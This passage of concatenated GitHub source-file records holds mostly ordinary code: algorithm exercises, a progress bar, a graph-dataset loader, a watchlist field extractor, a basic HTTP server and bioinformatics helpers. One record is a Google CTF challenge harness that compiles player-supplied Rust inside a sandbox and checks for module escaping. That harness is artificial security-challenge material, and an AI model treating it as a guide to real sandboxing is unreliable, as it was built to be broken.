strs.sort(key=len)\n\n result = \"\"\n initial_word = strs[0]\n\n\n for index in range(len(initial_word)): # O(m)\n for word in strs[1:]: # O(n-1)\n if initial_word[index] != word[index]:\n return result\n result += initial_word[index]\n \n return result\n\n\nleet_Code = Solution()\nresult_1 = leet_Code.longestCommonPrefix([\"flower\",\"flow\",\"flight\"])\nresult_2 = leet_Code.longestCommonPrefix([\"dog\",\"racecar\",\"car\"])\n\nprint(result_1)\nprint(result_2)","repo_name":"marcocaldera/leet-code","sub_path":"easy/longestCommonPrefix.py","file_name":"longestCommonPrefix.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1152094006","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\ninput = sys.stdin.readline\n\nS = input().rstrip()\nl = []\nc = {'P':13, 'K':13, 'H':13, 'T':13}\nfor i in range(0, len(S), 3):\n l.append(S[i:i+3])\n\nfor v in l:\n c[v[0]] -= 1\n\nif len(set(l)) != len(l):\n print('GRESKA')\nelse:\n print(c['P'], c['K'], c['H'], 
c['T'])","repo_name":"hjyoon/baekjoon-answers","sub_path":"_11000/11507.py","file_name":"11507.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1996299504","text":"import time\nimport sys\nfrom tqdm import tqdm\n\ndef progressbar(desc:str,i, total_len,len_pbar=20):\n    s = \"[\" + \"#\" * int(i * len_pbar / total_len) + \" \" * (len_pbar - int(i * len_pbar / total_len)) + \"]\"\n    s = \"\\r%s %s:%.2f%%\"%(desc,s,1.0*i / total_len*100)\n    # print(s,end=\"\",flush=True,file=open(\"123.txt\",'w'))\n    print(s,end=\"\",flush=True)\n    # sys.stdout.write(s)\n    # return s\n\nclass Progressbar:\n    def __init__(self,pbar,total_len=None):\n        self.pbar = iter(pbar)\n        self.idx = 0\n        self.total_len = len(pbar) if total_len is None else total_len\n\n    def __iter__(self):\n        while True:\n            yield next(self.pbar)\n            self.idx += 1\n            if self.idx >= self.total_len:break\n\n    def set_description(self,desc):\n        progressbar(desc,self.idx+1,self.total_len)\n\nif __name__ == \"__main__\":\n    # fp = open(\"123.txt\", 'w')\n    # for i in range(300):\n    #     time.sleep(0.01)\n    #     progressbar(\"\",i+1,300)\n    #     print(i, flush=True, file=fp)\n    # fp.close()\n    pbar = Progressbar(enumerate(range(300)),300)\n    for i,j in pbar:\n        time.sleep(0.01)\n        pbar.set_description(str(i)+\" progress bar\")","repo_name":"wucng/toolcv","sub_path":"toolcv/tools/pbar.py","file_name":"pbar.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"13774445559","text":"from collections import defaultdict\r\n\r\n\r\nclass Graph:\r\n\r\n    def __init__(self):\r\n        # default dict to store a graph\r\n        self.graph = defaultdict(list)\r\n\r\n    # function to add an edge to the graph\r\n    def addEdge(self, u, v):\r\n        self.graph[u].append(v)\r\n\r\n    def BFS(self, source):\r\n        # mark all vertices as not visited\r\n        visited = [False] * (max(self.graph) + 1)\r\n\r\n        # create a queue for BFS\r\n        queue = [source]\r\n\r\n        # mark source node as visited\r\n        visited[source] = True\r\n\r\n        while queue:\r\n            # dequeue a vertex from queue and print it\r\n            source = queue.pop(0)\r\n            print(source, end=\" \")\r\n\r\n            # Get all adjacent vertices of the\r\n            # dequeued vertex s. 
If an adjacent\r\n            # has not been visited, then mark it\r\n            # visited and enqueue it\r\n            for i in self.graph[source]:\r\n                if not visited[i]:\r\n                    queue.append(i)\r\n                    visited[i] = True\r\n\r\n\r\n# Driver code\r\n\r\n# Create a graph given in\r\n# the above diagram\r\ng = Graph()\r\ng.addEdge(0, 1)\r\ng.addEdge(0, 2)\r\ng.addEdge(1, 2)\r\ng.addEdge(2, 0)\r\ng.addEdge(2, 3)\r\ng.addEdge(3, 3)\r\n\r\nprint(\"Following is Breadth First Traversal\"\r\n      \" (starting from vertex 2)\")\r\ng.BFS(1)\r\n","repo_name":"kbikeguy/mycodes","sub_path":"Python/bfs_practice/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16568024076","text":"from sklearn.model_selection import StratifiedShuffleSplit\nfrom torch import zeros_like, manual_seed\nfrom torch_geometric.datasets import Planetoid, WebKB\n\nmanual_seed(7)\n\ndef stratified_split(data, labels, train_split: float = 0.9):\n    splitter = StratifiedShuffleSplit(n_splits=1, train_size=train_split, random_state=7)\n    for train, test in splitter.split(data, labels):\n        train = train\n        test = test\n    return train, test\n\ndef get_dataset(name:str, root:str, train_split:float = None):\n    if name == \"cora\":\n        dataset = Planetoid(root=root, name=name)\n    elif name == \"wisconsin\":\n        dataset = WebKB(root=root, name=name)\n    else:\n        print(\"Invalid dataset!\")\n        exit(1)\n    data = dataset[0]\n    # In case multiple train-val-test splits are provided.\n    if len(data.train_mask.size()) != 1:\n        data.train_mask = data.train_mask[:, 0]\n        data.val_mask = data.val_mask[:, 0]\n        data.test_mask = data.test_mask[:, 0]\n\n    if train_split != 1.0:\n        train_indices, __ = stratified_split(\n            data=data.train_mask.nonzero().flatten(),\n            labels=data.y[data.train_mask],\n            train_split=train_split,\n        )\n        train_mask = zeros_like(data.val_mask)\n        train_mask[train_indices] = True\n        data.train_mask = train_mask\n    return data\n","repo_name":"Samidha09/COL870","sub_path":"Assignment_2/node-classification/src/graphsage/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74211640248","text":"#bruteforce Algorithm\nimport sys\ninput = sys.stdin.readline\nn, m, b = map(int, input().split())\nground = [list(map(int, input().split())) for _ in range(n)]\nhighest = max(map(max, ground))\nlowest = min(map(min, ground))\n\ntime = int(1e9)\nheight = 0\n\nfor h in range(lowest, highest+1):\n    use = 0\n    get = 0\n    \n    for i in range(n):\n        for j in range(m):\n            if ground[i][j] > h:\n                get += (ground[i][j] - h)\n            else:\n                use += (h - ground[i][j])\n    if b + get < use:\n        continue\n    needTime = use + get*2\n    if time >= needTime:\n        time = needTime\n        height = h\nprint(time, height)","repo_name":"hyungyu-02/PythonStudy_Bj_Army","sub_path":"pyCodes/18111.py","file_name":"18111.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13016855480","text":"import json\nimport logging\nimport re\n\nfrom etl_pipeline.config import pipeline_config\n\ncn = pipeline_config.cn\n\nlogger = logging.getLogger(\"main\").getChild(\"extractor\")\n\n\ndef safe_field_extractor(func):\n    def wrap(*args, **kwargs):\n        try:\n            result = func(*args, **kwargs)\n        except Exception as e:\n            logger.error(e)\n            result = \"\"\n        return result\n\n    return wrap\n\n\nclass WatchlistExtractor:\n    def as_list(self, x):\n        if not 
x:\n return []\n elif isinstance(x, list):\n return x\n else:\n return [x]\n\n @safe_field_extractor\n def parse_dob_dict(self, dob):\n dmy = [\"\", \"\", \"\"]\n result = []\n date_range = []\n for k, v in dob.items():\n if k.upper() == \"Y\":\n dmy[-1] = v\n elif k.upper() == \"M\":\n dmy[1] = v\n elif k.upper() == \"D\":\n dmy[0] = v\n elif k == \"S8_extracted_value\" or k == \"dob\":\n if isinstance(v, str):\n if \" TO \" in v.upper():\n date_range.extend(sorted(re.findall(r\"\\d\\d\\d\\d\", v), key=lambda x: int(x)))\n else:\n result.append(v)\n if isinstance(v, dict):\n result.extend(self.parse_dob_dict(v))\n else:\n result.append(v)\n return result, date_range, dmy\n\n @safe_field_extractor\n def extract_dob(self, record):\n result = []\n entity = record.get(\"entity\", {})\n dobs = entity.get(\"dobs\", [])\n if isinstance(dobs, str):\n return [dobs]\n if not dobs:\n return []\n if not isinstance(dobs, list):\n dobs = [dobs]\n if isinstance(dobs[0], dict):\n for dob in dobs:\n result, date_range, dmy = self.parse_dob_dict(dob)\n result.append(\"/\".join([str(i) for i in dmy if i]))\n if len(date_range) == 2:\n result.extend(\n [str(elem) for elem in range(int(date_range[0]), int(date_range[-1]) + 1)]\n )\n return result\n return \"\"\n\n @safe_field_extractor\n def extract_nationality(self, record):\n result = []\n entry_list = []\n entry = record.get(\"entity\", {}).get(\"nationalities\", {})\n try:\n entry_list.append(entry.get(\"nationality\", \"\"))\n except AttributeError:\n pass\n data_item_list = self.as_list(entry_list)\n for item in data_item_list:\n if type(item) is dict:\n result.append(item.get(\"#text\", item.get(\"text\")))\n else:\n result.append(item)\n return result\n\n @safe_field_extractor\n def extract_citizenships(self, record):\n result = []\n entry_list = []\n entry = record.get(\"entity\", {}).get(\"citizenships\", {})\n try:\n entry_list.append(entry.get(\"citizenship\", \"\"))\n except AttributeError:\n pass\n data_item_list = self.as_list(entry_list)\n for item in data_item_list:\n if type(item) is dict:\n result.append(item.get(\"#text\", item.get(\"text\")))\n else:\n result.append(item)\n return result\n\n @safe_field_extractor\n def extract_wl_data_by_path(self, record, field1, field2):\n entry = record.get(\"entity\", {}).get(field1, {})\n try:\n destination = entry.get(field2, \"\")\n except AttributeError:\n if isinstance(entry, list):\n results = [self.extract_single_array_element(dest[field2]) for dest in entry]\n return results\n else:\n return []\n return self.extract_single_array_element(destination)\n\n @safe_field_extractor\n def extract_single_array_element(self, destination):\n result = []\n entry_list = []\n if isinstance(destination, list):\n entry_list.extend(destination)\n else:\n entry_list.append(destination)\n data_item_list = self.as_list(entry_list)\n\n for item in data_item_list:\n if type(item) is dict:\n result.append(item.get(\"#text\", item.get(\"text\")))\n else:\n result.append(item)\n return result\n\n @safe_field_extractor\n def extract_wl_addresses(self, record):\n result = {}\n addresses = []\n entity = record.get(\"entity\", {})\n if \"addresses\" in entity and \"address\" in entity[\"addresses\"]:\n addresses = self.as_list(record[\"entity\"][\"addresses\"][\"address\"])\n idx = 0\n for item in addresses:\n if type(item) is dict:\n for k, v in item.items():\n full_key = \"WL_\" + k.upper()\n if full_key not in result:\n result[full_key] = []\n result[full_key].append(v)\n else:\n result[\"WL_ADDRESS\" + str(idx)] = 
item\n idx += 1\n\n return result\n\n @safe_field_extractor\n def extract_wl_routing_codes(self, record):\n routing_codes_dict = {}\n if (\n \"entity\" in record\n and \"routingCodes\" in record[\"entity\"]\n and \"routingCode\" in record[\"entity\"][\"routingCodes\"]\n ):\n routing_codes = self.as_list(record[\"entity\"][\"routingCodes\"][\"routingCode\"])\n if routing_codes:\n if isinstance(routing_codes[0], dict):\n for routing_code in routing_codes:\n key_name = \"WL_ROUTING_CODE_\" + routing_code.get(\n \"@type\", routing_code.get(\"type\")\n ).replace(\" \", \"_\")\n if key_name not in routing_codes_dict:\n routing_codes_dict[key_name] = []\n routing_codes_dict[key_name].append(\n routing_code.get(\"#text\", routing_code.get(\"text\"))\n )\n\n # Convert lists to JSON\n for k, v in routing_codes_dict.items():\n routing_codes_dict[k] = json.dumps(v)\n\n if isinstance(routing_codes[0], list):\n routing_codes_dict = []\n\n return routing_codes_dict\n\n @safe_field_extractor\n def extract_wl_matched_tokens(self, payload):\n input_tokens = []\n for descriptor in payload.get(\"stopDescriptors\", []):\n details = descriptor.get(\"stopDescriptorDetails\", [])\n for detail in details:\n input_tokens.append(detail.get(\"inputToken\", \"\"))\n return {cn.WL_MATCHED_TOKENS: json.dumps(input_tokens)}\n\n @safe_field_extractor\n def extract_country(self, match):\n try:\n address = match.get(\"entity\", {}).get(\"addresses\", {}).get(\"address\")\n except AttributeError:\n address = match.get(\"entity\", {}).get(\"addresses\", {})\n\n if isinstance(address, dict):\n return address.get(\"country\") or address.get(\"address2\")\n elif isinstance(address, list):\n countries = []\n for elem in address:\n countries.append(elem.get(\"country\"))\n countries.append(elem.get(\"address2\"))\n return \"|\".join(list(filter(lambda x: x is not None, countries)))\n\n @safe_field_extractor\n def extract_country_name(self, match):\n try:\n address = match.get(\"entity\", {}).get(\"addresses\", {}).get(\"address\")\n except AttributeError:\n address = match.get(\"entity\", {}).get(\"addresses\", {})\n if isinstance(address, dict):\n return address.get(\"countryName\")\n elif isinstance(address, list):\n countries = []\n for elem in address:\n countries.append(elem.get(\"countryName\"))\n return \"|\".join(list(filter(lambda x: x is not None, countries)))\n\n @safe_field_extractor\n def extract_wlp_type(self, wl_entitytype):\n entity_type_ind = [\"03\"]\n entity_type_pep = [\"07\"]\n entity_type_ind = entity_type_ind + entity_type_pep\n value = \"C\"\n if wl_entitytype in entity_type_ind:\n value = \"I\"\n return {\"WLP_TYPE\": value}\n\n @safe_field_extractor\n def update_match_with_wl_values(self, match):\n wl_record_data = {\n \"SRC_REF_KEY\": match.get(\"uniqueCustomerId\", \"\"),\n \"VERSION_ID\": match.get(cn.MATCH_RECORD_VERSION_ID, \"\"),\n \"ENTITY_ID\": match.get(\"entityId\", \"\"),\n \"ENTITY_VERSION\": match.get(\"entityVersion\", \"\"),\n \"WL_NAME\": match.get(\"entity\", {}).get(\"name\", \"\"),\n \"WL_DOB\": self.extract_dob(match),\n \"WL_ENTITYTYPE\": match.get(\"entityType\", \"\"),\n \"WL_COUNTRY\": self.extract_country(match),\n \"WL_COUNTRYNAME\": self.extract_country_name(match),\n \"WL_NATIONALITY\": self.extract_nationality(match),\n \"WL_CITIZENSHIP\": self.extract_citizenships(match),\n \"WL_POB\": self.extract_wl_data_by_path(match, \"pobs\", \"pob\"),\n \"WL_ALIASES\": self.extract_wl_data_by_path(match, \"aliases\", \"alias\"),\n }\n 
wl_record_data.update(self.extract_wl_addresses(match))\n wl_record_data.update(self.extract_wl_matched_tokens(match))\n wl_record_data.update(self.extract_wl_routing_codes(match))\n wl_record_data.update(self.extract_wlp_type(wl_record_data[\"WL_ENTITYTYPE\"]))\n\n try:\n wl_record_data[\"WL_DOCUMENT_NUMBER\"] = self.extract_wl_data_by_path(match, \"ids\", \"id\")\n except (KeyError, TypeError):\n wl_record_data[\"WL_DOCUMENT_NUMBER\"] = \"\"\n\n match.update(wl_record_data)\n","repo_name":"ngraczykowski/iris-root","sub_path":"modules/etl-pipeline/etl_pipeline/custom/ms/watchlist_extractor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41618810481","text":"import os\nimport shutil\nimport subprocess\nimport sys\nimport json\n\ndef socket_print(string):\n print(\"=====\", string, flush=True)\n\n\ndef get_user_input():\n socket_print(\"Enter partial source for edge compute app (EOF to finish):\")\n user_input = []\n while True:\n try:\n line = input()\n except EOFError:\n break\n if line == \"EOF\":\n break\n user_input.append(line)\n socket_print(\"Input accepted!\")\n return user_input\n\n\ndef write_to_rs(contents):\n socket_print(\"Writing source to disk...\")\n rs_prelude = \"\"\"#![no_std]\n use proc_sandbox::sandbox;\n\n #[sandbox]\n pub mod user {\n // BEGIN PLAYER REPLACEABLE SECTION\n \"\"\".splitlines()\n\n with open('/home/user/sources/user-0/src/lib.rs', 'w') as fd:\n fd.write('\\n'.join(rs_prelude))\n fd.write('\\n'.join(contents))\n fd.write(\"\\n}\\n\")\n\ndef check_user_input():\n socket_print(\"Validating user input before compiling...\")\n result = subprocess.run(\"/home/user/rustup/toolchains/nightly-2020-10-08-x86_64-unknown-linux-gnu/bin/rustc user-0/src/lib.rs -Zast-json=yes\", cwd=\"/home/user/sources\", shell=True, timeout=150, capture_output=True)\n try:\n ast = json.loads(result.stdout)\n if len(ast[\"module\"][\"items\"]) != 5:\n socket_print(\"Module escaping detected, aborting.\")\n sys.exit(1)\n\n except json.JSONDecodeError:\n socket_print(\"Something went wrong during validation -- is your input malformed?\")\n sys.exit(1)\n\ndef build_challenge():\n socket_print(\"Building edge compute app...\")\n shutil.copytree(\"/home/user/build-cache\", \"/tmp/chal-build\")\n # `rustc --version` == \"rustc 1.47.0\"\n result = subprocess.run(\"PATH=/usr/bin:$PATH LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu/ CARGO_TARGET_DIR=/tmp/chal-build /usr/bin/cargo build --frozen --offline\", cwd=\"/home/user/sources\", shell=True, timeout=150)\n if result.returncode:\n socket_print(\"non-zero return code on compilation: \" + str(result.returncode))\n sys.exit(1)\n socket_print(\"Build complete!\")\n\n\ndef run_challenge():\n socket_print(\"Testing edge compute app...\")\n result = subprocess.run(\"/tmp/chal-build/debug/server\", shell=True, timeout=10)\n socket_print(\"Test complete!\")\n\n\ndef main():\n user_input = get_user_input()\n write_to_rs(user_input)\n build_challenge()\n\n # Check user input after building since the compilation in check_user_input() will\n # generate errors after generating the ast since the compilation command is\n # incomplete. 
Let the proper build run first so users can be presented with any\n # compilation issues, then validate it before we actually run.\n check_user_input()\n\n run_challenge()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"google/google-ctf","sub_path":"2021/quals/pwn-memsafety/challenge/chal.py","file_name":"chal.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":4153,"dataset":"github-code","pt":"77"} +{"seq_id":"46275813794","text":"# -*- coding: utf-8 -*-\n\n# Author: Tom Bresee \n#\n# License: BSD 3 clause\n\nfrom .__about__ import (\n __version__,\n)\n\n# this is for \"from import *\"\n__all__ = [\"SVM\",\n \"datasets\",\n \"decision_tree\",\n \"kNN\",\n \"model_evaluation\",\n \"naive_bayes\",\n \"neural_network\",\n ]\n\n# this was originally for _naive_bayes.py and is more widely applicable to other modules\nfrom .datasets import public_dataset\nimport os\nos.environ[\"NLTK_DATA\"] = public_dataset(\"nltk_data_path\")\nos.environ[\"SCIKIT_LEARN_DATA\"] = public_dataset(\"scikit_learn_data_path\")\n","repo_name":"tombresee/wolvr","sub_path":"wolvr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18939130002","text":"#program to count the number of bits in an integer\n\ndef count_bits(num):\n num_bits = 0\n while num:\n num_bits += num & 1\n num >>= 1\n return num_bits\n\noutput = count_bits(7)\nprint(output)\n","repo_name":"pdange21/Elements-of-Programming-in-Python","sub_path":"Chapter_4_Primitive_Types/bit_counter.py","file_name":"bit_counter.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29863626078","text":"import argparse\nfrom datetime import datetime\nimport logging\nimport mimetypes\nimport multiprocessing\nimport os\nimport socket\nimport traceback\nfrom typing import Optional\nfrom urllib.parse import unquote, urlparse\n\nHTTP_PROTOCOL = \"HTTP/1.1\"\nDOCUMENT_ROOT = \"www\"\nMAX_NUM_CONNECTIONS = 5\nCHUNK_SIZE = 1024\nMAX_REQUEST_SIZE = 8192\nCONNETION_TIMEOUT_SEC = 2\nHEADER_END_INDICATOR = \"\\r\\n\\r\\n\"\n\nHTTP_200_OK = 200\nHTTP_400_BAD_REQUEST = 400\nHTTP_403_FORBIDDEN = 403\nHTTP_404_NOT_FOUND = 404\nHTTP_405_METHOD_NOT_ALLOWED = 405\nRESPONSE_CODES = {\n HTTP_200_OK: \"OK\",\n HTTP_400_BAD_REQUEST: \"Bad Request\",\n HTTP_403_FORBIDDEN: \"Forbidden\",\n HTTP_404_NOT_FOUND: \"Not Found\",\n HTTP_405_METHOD_NOT_ALLOWED: \"Method Not Allowed\",\n}\n\n\nclass HTTPRequest:\n methods = (\"GET\", \"HEAD\")\n\n def __init__(self, document_root):\n self.document_root = document_root\n\n def parse(self, request_data):\n lines = request_data.split(\"\\r\\n\")\n try:\n method, url, version = lines[0].split()\n method = method.upper()\n except ValueError:\n return HTTP_400_BAD_REQUEST, \"?\", \"?\", {}\n\n headers = {}\n for line in lines[1:]:\n if not line.split():\n break\n k, v = line.split(\":\", 1)\n headers[k.lower()] = v.strip()\n\n if method not in self.methods:\n return HTTP_405_METHOD_NOT_ALLOWED, method, url, headers\n\n code, path = self.parse_url(url)\n\n return code, method, path, headers\n\n def parse_url(self, url):\n parsed_path = unquote(urlparse(url).path)\n logging.debug(\"Parsed request path: {}\".format(parsed_path))\n path = self.document_root + os.path.abspath(parsed_path)\n\n is_directory = os.path.isdir(path)\n if is_directory:\n if not 
path.endswith(\"/\"):\n path += \"/\"\n path = os.path.join(path, \"index.html\")\n\n if not is_directory and parsed_path.endswith(\"/\"):\n return HTTP_404_NOT_FOUND, path\n if path.endswith(\"/\") or not os.path.isfile(path):\n return HTTP_404_NOT_FOUND, path\n\n return HTTP_200_OK, path\n\n\nclass HTTPResponse:\n def __init__(self, code, method, path, request_headers):\n self.code = code\n self.method = method\n self.path = path\n self.request_headers = request_headers\n\n def process(self):\n file_size = 0\n content_type = \"text/plain\"\n body = b\"\"\n if self.code == HTTP_200_OK:\n file_size = self.request_headers.get(\n \"content-length\", os.path.getsize(self.path)\n )\n if self.method == \"GET\":\n content_type = mimetypes.guess_type(self.path)[0]\n with open(self.path, \"rb\") as file:\n body = file.read(file_size)\n\n first_line = \"{} {} {}\".format(\n HTTP_PROTOCOL, self.code, RESPONSE_CODES[self.code]\n )\n headers = {\n \"Date\": datetime.now().strftime(\"%a, %d %b %Y %H:%M:%S GMT\"),\n \"Server\": \"Python-edu-server/0.1.0\",\n \"Connection\": \"close\",\n \"Content-Length\": file_size,\n \"Content-Type\": content_type,\n }\n headers = \"\\r\\n\".join(\"{}: {}\".format(k, v) for k, v in headers.items())\n response = (\n \"{}\\r\\n{}{}\".format(first_line, headers, HEADER_END_INDICATOR).encode()\n + body\n )\n return response\n\n\ndef receive(connection):\n fragments = []\n while True:\n try:\n chunk = connection.recv(CHUNK_SIZE).decode()\n except TimeoutError:\n logging.debug(\"Timeout for chunk recieving...\")\n break\n\n if (\n not chunk\n or HEADER_END_INDICATOR in chunk\n or len(fragments) * CHUNK_SIZE >= MAX_REQUEST_SIZE\n ):\n fragments.append(chunk)\n break\n\n fragments.append(chunk)\n request = \"\".join(fragments)\n return request\n\n\ndef handle_request(\n connection: socket.socket, address: tuple, document_root: str\n) -> None:\n try:\n request_data = receive(connection)\n request = HTTPRequest(document_root)\n code, method, path, headers = request.parse(request_data)\n response = HTTPResponse(code, method, path, headers)\n response_data = response.process()\n\n logging.info('\"{} {} {}\" {}'.format(method, path, HTTP_PROTOCOL, code))\n connection.sendall(response_data)\n except:\n logging.exception(\"Error while sending response to {}\".format(address))\n finally:\n logging.debug(\"Closing socket for {}\".format(address))\n connection.close()\n\n\nclass HTTPServer:\n def __init__(\n self,\n host: str = \"localhost\",\n port: int = 8080,\n document_root: str = DOCUMENT_ROOT,\n max_num_connections: int = 0,\n ) -> None:\n self.host = host\n self.port = port\n self.document_root = document_root\n self.max_num_connections = max_num_connections\n\n def run(self) -> None:\n try:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)\n self.socket.bind((self.host, self.port))\n self.socket.listen(self.max_num_connections)\n except socket.error as e:\n raise RuntimeError(e)\n\n def serve_forever(self) -> None:\n while True:\n client_connection, client_address = self.socket.accept()\n client_connection.settimeout(CONNETION_TIMEOUT_SEC)\n logging.debug(\"Obtain request from {}\".format(client_address))\n handle_request(\n client_connection,\n client_address,\n self.document_root,\n )\n\n\ndef run_server(host: str, port: int, workers: int, document_root: str):\n logging.info(\n \"Starting server at http://{}:{} with root dir - 
{}\".format(\n host, port, document_root\n )\n )\n server = HTTPServer(host, port, document_root)\n server.run()\n\n processes = []\n try:\n for _ in range(workers):\n process = multiprocessing.Process(target=server.serve_forever)\n processes.append(process)\n process.start()\n logging.debug(\"Worker with id {} was started\".format(process.pid))\n for process in processes:\n process.join()\n except KeyboardInterrupt:\n for process in processes:\n if process:\n process.terminate()\n logging.debug(\"Worker with id {} was terminated\".format(process.pid))\n\n\ndef init_logging_config(filename: Optional[str] = None, level: str = \"INFO\") -> None:\n try:\n logging.basicConfig(\n filename=filename,\n filemode=\"a\",\n format=\"[%(asctime)s] %(levelname).1s %(message)s\",\n datefmt=\"%Y.%m.%d %H:%M:%S\",\n level=getattr(logging, level),\n )\n except TypeError:\n logging.error(\"Error initializing the logging system\")\n traceback.print_stack()\n return False\n\n return True\n\n\ndef parse_arguments() -> argparse.Namespace:\n parser = argparse.ArgumentParser(description=\"Basic http server\")\n\n parser.add_argument(\"-s\", \"--host\", type=str, default=\"127.0.0.1\", help=\"Hostname\")\n parser.add_argument(\"-p\", \"--port\", type=int, default=8080, help=\"Port number\")\n parser.add_argument(\n \"-w\", \"--workers\", type=int, default=5, help=\"Number of workers\"\n )\n parser.add_argument(\n \"-r\",\n \"--root\",\n type=str,\n default=DOCUMENT_ROOT,\n help=\"Files root directory (DOCUMENT_ROOT)\",\n )\n parser.add_argument(\n \"-d\", \"--debug\", action=\"store_true\", help=\"Show debug messages\"\n )\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n if args.debug:\n init_logging_config(level=\"DEBUG\")\n else:\n init_logging_config(level=\"INFO\")\n run_server(args.host, args.port, args.workers, args.root)\n","repo_name":"shevelsm/otus-python-pro","sub_path":"hw4-otuserver/httpd.py","file_name":"httpd.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"469546916","text":"import glob\nimport gzip\nimport logging\nimport math\nimport os\nimport subprocess\nimport sys\nimport traceback\n\nfrom configparser import ConfigParser\nfrom collections import defaultdict\n\nimport pandas as pd\nimport numpy as np\nfrom natsort import natsorted\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport scipy\n\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\nfrom kneed import KneeLocator\n\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse.csgraph import connected_components\n\nfrom mapseq.utils import dataframe_to_seqlist, write_fasta_from_df, remove_base_repeats\nfrom mapseq.utils import run_command_shell, NonZeroReturnException, merge_dfs \nfrom mapseq.utils import merge_tsvs, setup_logging\nfrom mapseq.utils import JobRunner, JobStack, JobSet\n\nfrom mapseq.bowtie import run_bowtie, make_bowtie_df\n\nfrom mapseq.barcode import *\n\ndef fix_columns_int(df, columns):\n '''\n forces column in dataframe to be an integer. NaNs become '0'\n Only floating points can be NaN. 
No good solution for integers...\n '''\n for col in columns:\n try:\n logging.debug(f'trying to fix col {col}')\n fixed = np.array(df[col], np.int16)\n logging.debug(f'fixed=\\n{fixed}')\n df[col] = fixed\n \n except ValueError:\n logging.debug(f'invalid literal in {col}')\n return df\n\ndef fix_columns_str(df, columns):\n '''\n forces column in dataframe to be string NaNs become ''\n '''\n for col in columns:\n try:\n logging.debug(f'trying to fix col {col}')\n df[col].replace(0,'',inplace=True)\n df[col].replace(np.nan,'', inplace=True)\n \n except Exception as ex:\n logging.error(f'error while handling {col} ')\n logging.warning(traceback.format_exc(None))\n return df\n\n\ndef get_default_config():\n dc = os.path.expanduser('~/git/mapseq-processing/etc/mapseq.conf')\n cp = ConfigParser()\n cp.read(dc)\n return cp\n\n\ndef get_rtlist(sampledf):\n rtlist = list(sampledf['rtprimer'].dropna())\n nrtlist = []\n for x in rtlist:\n try:\n y = int(x)\n nrtlist.append(y)\n except ValueError:\n logging.debug(f'ignoring bad int() input.')\n \n #rtlist = [int(x) for x in rtlist]\n \n nrtlist = [f'BC{x}' for x in nrtlist]\n return nrtlist\n\n\ndef package_pairfiles(infiles):\n '''\n pack up input list of elements into list of paired tuples. \n ['a','b','c','d'] -> [('a','b'),('c','d')]\n\n '''\n if len(infiles) %2 != 0:\n logging.error(f'number of elements must be multiple of two!')\n \n infilelist = []\n a = None\n b = None\n for i,v in enumerate(infiles):\n if i % 2 == 0:\n a = v\n else:\n b = v\n t = (a,b)\n logging.info(f'input pair of readfiles: r1={a} r2={b}')\n infilelist.append(t)\n return infilelist\n\n\ndef guess_site(infile, sampdf):\n '''\n will look at filename and try to guess rt primer number, then \n look for siteinfo in sampledf\n \n NOTE: assumes BC.fasta or SSI.fasta and identifiers\n consist of digits. \n \n '''\n logging.info(f'guessing site/brain/region for FASTA file {infile}')\n filepath = os.path.abspath(infile) \n dirname = os.path.dirname(filepath)\n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename) \n head = base.split('.')[0]\n rtprimer_num = ''.join(i for i in head if i.isdigit())\n rtprimer_num = int(rtprimer_num)\n logging.debug(f'base={base} head={head} guessing rtprimer={rtprimer_num} sampdf=\\n{sampdf}')\n \n df = sampdf[sampdf['rtprimer'] == rtprimer_num]\n df.reset_index(inplace=True, drop=True)\n site = None\n if len(df)> 0:\n try:\n site = df['siteinfo'][0]\n except:\n logging.warning(f'unable to get siteinfo for {infile}')\n site = 'target' # default to target. \n \n try: \n brain = df['brain'][0]\n except:\n logging.warning(f'unable to get brain info for {infile}')\n brain = '1'\n\n try: \n region = df['region'][0]\n except:\n logging.warning(f'unable to get region info for {infile}')\n region = str(rtprimer_num) # default to SSI label \n \n logging.debug(f'got site={site} brain={brain} region={region} for rtprimer={rtprimer_num}') \n\n logging.debug(f'got site={site} for rtprimer guessed from {infile}')\n return (rtprimer_num, site, brain, region )\n \n \n \ndef process_ssifasta(config, infile, outdir=None, site=None):\n '''\n by default, outdir will be same dir as infile\n assumes infile fasta has already been trimmed to remove SSI\n \n site = ['target-control','injection-control','target','target-negative',target-lone'] \n Will use relevant threshold. 
